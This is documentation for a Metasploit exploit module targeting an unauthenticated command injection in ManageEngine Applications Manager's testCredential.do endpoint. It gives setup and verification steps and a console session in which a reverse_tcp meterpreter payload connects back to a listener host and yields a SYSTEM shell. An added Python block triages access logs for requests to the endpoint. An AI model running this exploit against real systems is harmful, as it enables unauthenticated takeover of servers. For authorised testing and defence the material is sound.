GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md

Vulnerable Application

This module exploits a command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute an operating system command in the context of a privileged user. The publicly accessible testCredential.do endpoint takes multiple user inputs and validates the supplied credentials by accessing the given system. This endpoint calls several internal classes and then executes a PowerShell script without validating a user-supplied parameter when the given system is OfficeSharePointServer.
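An added example, not part of the Metasploit documentation or the module: because the endpoint is reachable without authentication, every request to testCredential.do is worth triaging, and requests from outside administrator networks most of all. The code assumes common-log-format access logs; the admin network, the sample lines and the PLACEHOLDER parameter name are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Assumption: common-log-format access lines (adjust LOG_RE to your server's format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
ENDPOINT = "/testcredential.do"         # endpoint named on this page, lower-cased
SYSTEM_TYPE = "officesharepointserver"  # system type named on this page, lower-cased
# Assumption: networks administrators legitimately use to reach the console.
ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample log lines (documentation address ranges, placeholder parameter name).
SAMPLE = [
    '10.20.0.15 - - [01/Jan/2024:10:00:00 +0000] "GET /index.do HTTP/1.1" 200 512',
    '10.20.0.15 - - [01/Jan/2024:10:01:00 +0000] "POST /testCredential.do HTTP/1.1" 200 128',
    '203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "POST /testCredential.do HTTP/1.1" 200 128',
    '198.51.100.9 - - [01/Jan/2024:10:03:00 +0000] '
    '"GET /TestCredential.do;jsessionid=X?PLACEHOLDER=OfficeSharePointServer HTTP/1.1" 200 128',
]

def triage(lines, admin_nets=ADMIN_NETS):
    """Return one finding per request that reached the testCredential.do endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # Normalise: percent-decode, drop ";jsessionid=..." path parameters, lower-case.
        path = unquote(parts.path).split(";")[0].lower()
        if not path.endswith(ENDPOINT):
            continue
        try:
            outside = not any(ipaddress.ip_address(m["ip"]) in n for n in admin_nets)
        except ValueError:
            outside = True  # client field is not an IP (e.g. a hostname): treat as untrusted
        findings.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": int(m["status"]),
            "outside_admin_nets": outside,
            # POST bodies are not in access logs, so False here does not clear the request.
            "sharepoint_in_query": SYSTEM_TYPE in unquote_plus(parts.query).lower(),
            "severity": "high" if outside else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```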

Vulnerable Application Installation Steps

Go to the following website and download the Windows version of the product. It comes with built-in Java and PostgreSQL, so you don't need to install anything else: http://archives.manageengine.com/applications_manager/13630/

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole

  • use exploit/windows/http/manageengine_appmanager_exec

  • Set RHOST <RHOST>

  • Set PAYLOAD windows/meterpreter/reverse_tcp

  • Set LHOST <LHOST>

  • Run check

  • Verify that you are seeing "The target is vulnerable." in console.

  • Run exploit

  • Verify that you are seeing "Triggering the vulnerability" in console.

  • Verify that you are seeing "Sending stage to <TARGET>" in console.

  • Verify that you have your shell.

Scenarios

msf >
msf > use exploit/windows/http/manageengine_appmanager_exec
msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Triggering the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM